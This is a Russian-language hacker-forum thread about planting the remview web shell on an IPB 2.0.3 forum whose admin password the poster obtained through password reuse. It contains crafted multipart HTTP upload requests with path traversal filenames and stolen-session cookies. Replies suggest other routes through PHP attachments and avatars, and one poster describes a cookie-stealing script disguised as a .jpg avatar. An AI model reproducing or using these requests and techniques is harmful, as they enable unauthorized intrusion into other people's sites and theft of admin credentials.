Вопрос про заливку шелла в IPB, посредством программы InetCrack
 

Господа, здравствуйте!
Есть форум IPB 2.0.3
Есть hash админа
Есть session_id админа
Собственно и в админку могу зайти (пароль админа тоже знаю)
Но пермишны на папку со смайлами стоят неправильные и remview туда залить не могу.
Попытался InetCrack-ом по статье товарища Algol-а (http://antichat.ru/txt/IPB) подменить запрос чтобы залить remview в /uploads (эта папка открыта на запись), но не получилось.
Вот что я делал
1. Взял InetCrack
2. Пишу вот такой запрос в InetCrack-е

--------

POST http://АДРЕС_ФОРУМА/admin.php?adsess=СЕССИЯ_АДМИНА HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://АДРЕС_ФОРУМА/admin.php?adsess...ct=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=ID_АДМИНА; pass_hash=ХЕШ_АДМИНА;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

СЕССИЯ_АДМИНА
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/REMVIEW.PHP"
Content-Type: application/octet-stream

Сюда, я так понял нада писать код remview-а
-----------------------------7d43942c405bc--

--------

В ответ получаю ответ сервера и когда клацаю в InetCrack-е кнопку "Show body in browser" появляется окно броузера, в котором вижу кусок админки IPB-форума с надписью "Вы не выбрали папку для загрузки смайликов"
При этом ни в папке смайлов ни в папке /uploads не появляется файл remview.php

Подскажите, пожалуйста, что я делаю не так
Может не тот запрос в InetCrack запихиваю
Не могли бы написать 100%-но рабочий HTTP-запрос для IPB версии 2.0.3
Заранее очень благодарен!!!

Еще я понял, что можно как-то через заливку аватаров попытаться залить remview.
Подскажите, пожалуйста, как???

Проверь правильность session_id Админа.

В IPB 2.0.3 надо ставить не admin.php?adsess= , а admin.php?s=

дык я ж ее беру из ссылки
Т.е. захожу в админку под логином/паролем админа и из УРЛ-а браузера беру session_id
Тем более если бы был неправильный session_id, то я думаю, что мне бы это написало, а так пишел, что я не выбрал папку для загрузки смайлика

Я не понял где файл который ты загружаешь?

тока шо зашел на тот форум под логино/паролем и урл выглядит вот в таком формате
http://АДРЕС_ФОРУМА/admin.php?printframes=1&adsess=СЕССИЯ_АДМИНА&
т.е. получается все-таки admin.php?adsess=, а не admin.php?s=

да я так понял что нада не файл, а сам КОД этого файла писать в НТТР-запрос
Вот сюда
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/REMVIEW.PHP"
Content-Type: application/octet-stream

ВОТ СЮДА ПИШУ КОД remview.php
-----------------------------7d43942c405bc--

Других методов как его приаттачить я не вижу

А все-таки попробуй по совету S1nt3za Отпровь в Инет Кряке запрос с алреслом : POST http://АДРЕС_ФОРУМА/admin.php?s=СЕССИЯ_АДМИНА HTTP/1.0

Поставил admin.php?s=
не помогло
еще нашел что вместо act=op нада писать act=admin

В итоге вот что получилось

POST http://АДРЕС_ФОРУМА/admin.php? HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://АДРЕС_ФОРУМА/admin.php?act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=3; pass_hash=ХЕШ_АДМИНА;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

0ba3d31d16ebfc45939b7a14e510742f
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

admin
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/ad_smiles.php"
Content-Type: application/octet-stream

--CODE HERE--
-----------------------------7d43942c405bc--

все-равно не помогает
та же херня "Вы не выбрали директорию для загрузки смайлов"

Господа, ну помогите, пожалуйста!!!

Короче самый лёгкий способ это прицепить remview.php в темку (перед этим надо разрешить прикрепление php в темки) он автоматически зальётся в папку uploads , а далее дело техники !

чего-чего? в какую темку? с этого момента по подробнее плз =)

да нет
залить то он зальет в темку, но форум меняет имя файла перед заливкой в /uploads т.е. если файл назывался remview.php, то после заливки его название и расширение поменяется и залитые .php файлы будут отображаться как текстовые...
короче этот вариант не катит
тем более, что я даже не смогу узнать как этот файл переименуется

ГОСПОДАААА Ну помогите, пожалуйста, с InetCrack-ом
Я начинаю думать, что только через него можно что-то сделать!!!

Можно прицепить на php на аватарку
чтобы узнать какое имя у него будет даже ламососу понятно Правой кнопкой --> СВОЙСТВА ! =DD

а ты сам это пробовал???
форум даже с включенным разрешением на ПХП файлы в виде аватары благополучно создал мне в /upload .txt-файл с содержимым php файла
Господа, ну дайте, пожалуйста, реальные советы!!!

Корочи балин я писал на HTML код под IPB который отправляет куки в приват , и сохранил как jpg !
Вот потом загрузил эту картинку поставил на аватар , запостил ссылку на аватар и нажал на неё (у меня был IE(У Оперы такого бага нету)) как ни странно IE выполнил этот HTML и JavaScript код !!!!!
А под php я не пробовал !!!

я не понял
Ты что сначала писал как html, потом полученный хтмл-файл просто сохранил с расширением .jpg???
и ОНО что заработало???

Ну что???
Никто не может помочь???

Да сохранил в jpg , прицепил на аватарку и как ни странно ЗАРАБОТАЛО !
ЗЫ Такая бага только в IPB 2.0.x =) ;) B)

Прицепить файл пхп к темке неполучится.
Запрос модифицировать мне кажется тоже не получится, там генерируется session id только при вводе реального пароля. Врядли чтото получится сделать что бы там не говорили.

Получится только если откроешь этот свой аватар. С таким же успехом можно просто загрузить картинку в форум. Это не уязвимость форума, и даже не уязвимость IE а особенность. А через тэг img в аватаре скрипт на клиенте уже не будет отрабатываться

А как пароль админа достал? ведь хеш не то что нужно 8( ?

у админа форума на все один и тот же пароль.
Я узнал пароль от почты, а он подошел к форуму

Слушай, а если я реальный пароль знаю.
Т.е. у меня есть и пароль и его хеш!
Может все-таки получится запрос модифицировать????

Algol, молю тебя :)
Помоги хоть ты!!!
Или хотя бы ответь. Статья, которую ты писал актуальна только для IPB 1.*
Или для 2.0.3 тоже пойдет???
Подскажи, ПОЖАЛУЙСТА, как переделать запрос InetCrack-a

все
всем спасибо
уже все сделал

В статье приведен пакет для версии 1.3 (кажется, я уже не помню точно).
Этот пакет был абсолютно рабочий для форума на котором я его тестировал.
Что касается неработоспособности на другом форуме, то это может объясняться тем что:
1)Относительный путь указан неправильно. (т.е. пути ../../uploads/ не существует относительно текущей директории)
2)Папка uploads закрыта на запись
3)Форум пропатчен и не допускает относительных путей для загружаемых файлов.

И что же было ?